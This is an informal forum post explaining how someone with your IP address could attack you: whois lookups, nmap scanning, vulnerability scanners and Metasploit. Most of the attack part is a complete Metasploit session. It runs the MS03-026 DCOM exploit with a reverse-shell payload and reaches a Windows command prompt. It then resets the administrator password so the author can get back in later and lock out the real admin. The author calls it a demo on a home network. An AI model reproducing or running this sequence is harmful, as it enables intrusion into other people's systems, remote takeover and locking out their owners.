yea i was jwing im cocasion and european so if they want to mess
with me they'll hav to fuck with the whole US. but jwing because people can
easily find out other peeps ip address so i was like thats fucked up if
they can do all this shit
If they have your IP address they can identify the 'target' host(s). How?
(a lots of different ways)one way to do A simple whois query from
can give them this information.
Once they have this information, they can easily fire up their favorite
port scanner nmap, for example, and scan your system to find open ports.
Why are they looking to find open ports?
Because open ports means the system is listening
Identify applications,servers, and so on that are running on your system
(based on the open ports they found) again, nmap can do this.
Next, find exploits specific to those applications and servers (if any) on
Nessus and GFI both free can do this. Metasploit has a nice selection of
exploits. Sites such as;
can assist as well.
Next, step Exploit the system.
Metaploit can easily do this.
[*] Starting the Metasploit Framework...
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf msrpc_dcom_ms03_026(win32_reverse) > set RPORT 135
RPORT -> 135
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.1.100
LHOST -> 192.168.1.100
msf msrpc_dcom_ms03_026(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026(win32_reverse) > exploit[*] Starting Reverse Handler.[*] Sending request...[*] Got connection from 192.168.1.100:4321 <-> 192.168.1.101:3054
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net users administrator *
Type a password for the user:
Retype the password to confirm:
The command completed successfully.
C:\WINDOWS\system32>Caught interrupt, exit connection? [y/n] y[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse) >
Box is now owned, and changed the Admin password for later entry into the system and to block out the real admin. This is a little demo on a PC ON my network.